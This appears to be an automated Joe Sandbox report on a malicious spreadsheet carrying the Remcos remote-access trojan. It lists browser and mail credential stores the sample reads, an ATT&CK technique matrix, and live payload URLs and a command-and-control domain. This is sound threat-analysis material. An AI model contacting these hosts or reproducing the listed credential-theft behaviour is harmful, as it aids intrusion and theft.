                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,17_2_10002264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,23_2_004082CD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,30_2_00449210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0041739B GetVersionExW,21_2_0041739B
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data30_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\30_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db30_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword23_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword23_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword23_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1432, type: MEMORYSTR

                    Remote Access Functionality

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000011.00000002.873711232.000000000248E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872848173.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.516366128.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.872488880.0000000000851000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe30_2_0040569A
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 121 Scripting | Valid Accounts | 11 Native API | 121 Scripting | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                    Credentials | Domains | Default Accounts | 23 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Bypass User Account Control | 21 Obfuscated Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
                    Email Addresses | DNS Server | Domain Accounts | 223 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 1 Install Root Certificate | 2 Credentials in Registry | 1 System Service Discovery | SMB/Windows Admin Shares | 21 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | Login Hook | 1 Windows Service | 1 DLL Side-Loading | 3 Credentials In Files | 4 File and Directory Discovery | Distributed Component Object Model | 211 Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | 4 PowerShell | Network Logon Script | 322 Process Injection | 1 Bypass User Account Control | LSA Secrets | 39 System Information Discovery | SSH | 4 Clipboard Data | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 3 Security Software Discovery | VNC | GUI Input Capture | 213 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Access Token Manipulation | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 322 Process Injection | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                    Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
                    [Behavior graph (image not reproduced): Behavior Graph ID: 1529026, Sample: QPS-36477.xls, Startdate: 08/10/2024, Architecture: WINDOWS, Score: 100]

                    Source | Detection | Scanner | Label | Link
                    QPS-36477.xls | 18% | ReversingLabs | Document-PDF.Trojan.Remcos
                    QPS-36477.xls | 100% | Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://www.imvu.comr | 0% | URL Reputation | safe
                    http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
                    https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
                    http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
                    https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                    http://www.imvu.com | 0% | URL Reputation | safe
                    https://contoso.com/Icon | 0% | URL Reputation | safe
                    http://crl.entrust.net/2048ca.crl0 | 0% | URL Reputation | safe
                    http://ocsp.entrust.net03 | 0% | URL Reputation | safe
                    https://contoso.com/License | 0% | URL Reputation | safe
                    http://go.micros | 0% | URL Reputation | safe
                    https://contoso.com/ | 0% | URL Reputation | safe
                    https://login.yahoo.com/config/login | 0% | URL Reputation | safe
                    http://ocsp.entrust.net0D | 0% | URL Reputation | safe
                    http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                    http://crl.entrust.net/server1.crl0 | 0% | URL Reputation | safe
                    http://geoplugin.net/json.gp | 0% | URL Reputation | safe
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    ia600102.us.archive.org | 207.241.227.242 | true | true | | unknown
                    wrath.me | 188.114.96.3 | true | false | | unknown
                    geoplugin.net | 178.237.33.50 | true | false | | unknown
                    idabo.duckdns.org | 135.148.195.248 | true | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    http://192.3.220.40/330/uh/newthingtobeonlinefor.hta | true | | unknown
                    https://wrath.me/EhYykL | false | | unknown
                    https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg | true | | unknown
                    http://192.3.220.40/330/RRCGGH.txt | true | | unknown
                    idabo.duckdns.org | true | | unknown
                    http://192.3.220.40/330/verybestthingswesharedfornew.tIF | true | | unknown
                    http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                      unknown
                                                                                                                                                                      http://geoplugin.net/json.gpORegAsm.exe, 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://contoso.com/powershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhv8392.tmp.21.drfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://192.3.220.40/330/uh/newthingtobeonlinefor.htahttp://192.3.220.40/330/uh/newthingtobeonlineformshta.exe, 00000004.00000003.438838908.00000000026B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.437632636.00000000026B5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475500690.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487438890.0000000002F65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhv8392.tmp.21.drfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://ocsp.entrust.net0Dmshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.452480910.0000000000272000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.593504050.000000001ABBC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://ia600102.us.archive.org/32/itpowershell.exe, 0000000C.00000002.553505468.0000000002854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.598837287.0000000002A21000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                                                                unknown
                                                                                                                                                                                https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3bhv8392.tmp.21.drfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.jsbhv8392.tmp.21.drfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.458200384.0000000012481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    http://192.3.220.40/mshta.exe, 00000004.00000002.442847727.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003328000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://www.ccleaner.com/go/app_cc_pro_trialkeybhv8392.tmp.21.drfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000002.442847727.00000000032DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.442847727.0000000003301000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.438571721.00000000032DC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C31F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.458812046.000000001C339000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539604202.000000001C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.475534357.0000000003978000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488611411.0000000003930000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488648080.000000000397A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487679300.0000000003979000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.510837284.000000001C3EC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C39A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.594996532.000000001C38A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://contextual.media.net/8/nrrV73987.jsbhv8392.tmp.21.drfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://geoplugin.net/json.gpyRegAsm.exe, 00000011.00000002.872488880.0000000000835000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:aubhv8392.tmp.21.drfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://www.imvu.com/GKRegAsm.exe, 00000018.00000002.483291462.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
135.148.195.248 | idabo.duckdns.org | United States | 18676 | AVAYAUS | true
188.114.97.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | wrath.me | European Union | 13335 | CLOUDFLARENETUS | false
207.241.227.242 | ia600102.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
192.3.220.40 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1529026
Start date and time: 2024-10-08 15:22:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
